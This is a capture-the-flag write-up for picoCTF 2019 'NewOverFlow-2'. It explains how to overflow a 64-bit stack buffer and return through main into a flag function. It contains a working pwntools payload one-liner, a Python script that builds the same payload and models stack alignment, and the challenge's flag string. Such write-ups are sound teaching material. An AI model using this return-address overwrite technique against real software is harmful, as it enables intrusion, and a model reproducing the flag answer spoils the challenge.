# NewOverFlow-2

## Problem

> Okay now let's try manipulating arguments. program. You can find it in /problems/newoverflow-2\_5\_13f3d3dc09fc09d6d5db8adfa899a05d on the shell server. Source.

* [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/NewOverFlow-2/vuln/README.md)
* [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/NewOverFlow-2/vuln.c)

## Solution

1. The challenge author forgot to remove the `flag` function so this is solvable using the same method as [NewOverFlow-1](https://picoctf2019.haydenhousen.com/binary-exploitation/newoverflow-1)
2. Find the offset/padding
   1. You can use the method described in [rop64](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/Binary/%20Exploitation/rop64/README.md) with `cyclic` and `cyclic_find`, or use the following steps:
   2. Open vuln in [radare2](https://rada.re/r/) with `r2 ./vuln`
   3. Run `aaaa`
   4. Run `pdf @ sym.vuln` to get `var int local_40h @ rbp-0x40`
   5. The `0x40` is the buffer's distance below `rbp`, so 8 more bytes are needed to get past the saved base pointer (the "saved ebp register" in 32-bit terms) before the return address is reached
   6. So the offset is `0x40+8`
3. Run `afl~flag` in [radare2](https://rada.re/r/) to get the address of `flag` and `afl~main` to get the address of `main`.
4. We cannot simply overflow and return straight into the `flag` function because that would leave the stack misaligned in 64-bit (the ABI expects `rsp` to be 16-byte aligned at a `call`, and `flag` calls libc functions that rely on it). Returning into `main` first consumes one more 8-byte slot before `main` itself returns into `flag`, which restores the alignment. So instead we form our payload as `padding + main_address + flag_address` rather than just `padding + flag_address` as we would in 32-bit.
5. We can use `p64` from pwntools to pack each address as 8 little-endian bytes.
6. Payload complete: `python2 -c "from pwn import *; print 'A'*(0x40+8) + p64(0x004008ce) + p64(0x0040084d)" | ./vuln`
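As an added illustration (not part of the original write-up), the following Python 3 script reproduces the offset calculation and `p64` packing used above without pwntools, and models `rsp mod 16` through the return chain to show why a direct return into `flag` is misaligned while going through `main` first is not. The radare2 line is the one quoted in step 2, the addresses are those from step 6, and the frame sizes are assumed to be multiples of 16 (as the compiler guarantees).

```python
import re
import struct

# Addresses from the write-up above (NewOverFlow-2 binary).
MAIN_ADDR = 0x004008CE
FLAG_ADDR = 0x0040084D

# Constructed sample: the radare2 line quoted from `pdf @ sym.vuln`.
R2_VAR_LINE = "var int local_40h @ rbp-0x40"


def overflow_offset(var_line: str) -> int:
    """Bytes from the start of the buffer to the saved return address.

    The buffer starts N bytes below rbp, the saved rbp takes the next
    8 bytes, and the return address follows immediately after it.
    """
    m = re.search(r"rbp-0x([0-9a-fA-F]+)", var_line)
    if not m:
        raise ValueError("no rbp-relative local found in line")
    return int(m.group(1), 16) + 8


def p64(value: int) -> bytes:
    """Pack an address as 8 little-endian bytes (what pwntools' p64 does)."""
    return struct.pack("<Q", value)


def build_payload(var_line: str, chain: list) -> bytes:
    """Padding up to the return address followed by the return chain."""
    return b"A" * overflow_offset(var_line) + b"".join(p64(a) for a in chain)


def rsp_mod16_at_entry(chain_len: int) -> int:
    """Model rsp mod 16 at entry of the LAST function in the return chain.

    The x86-64 ABI requires rsp % 16 == 8 at function entry (aligned
    before the `call` pushed the return address). Walk vuln's epilogue,
    then account for every intermediate function that returns normally.
    """
    rsp = 8                  # vuln entered via a proper call
    rsp = (rsp - 8) % 16     # push rbp (sub rsp, 0x40 keeps alignment)
    rsp = (rsp + 8) % 16     # leave: mov rsp, rbp; pop rbp
    rsp = (rsp + 8) % 16     # ret pops the first overwritten return address
    # Each intermediate hop (e.g. main) eventually executes its own ret,
    # popping 8 more bytes before control reaches the next chain entry.
    rsp = (rsp + 8 * (chain_len - 1)) % 16
    return rsp


def entry_is_aligned(chain: list) -> bool:
    """True if the final target is entered with ABI-conformant alignment."""
    return rsp_mod16_at_entry(len(chain)) == 8
```

Running `entry_is_aligned([FLAG_ADDR])` gives `False` and `entry_is_aligned([MAIN_ADDR, FLAG_ADDR])` gives `True`, which is the reason step 4 inserts `main_address` before `flag_address`.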

### Flag

`picoCTF{r0p_1t_d0nT_st0p_1t_b3358018}`
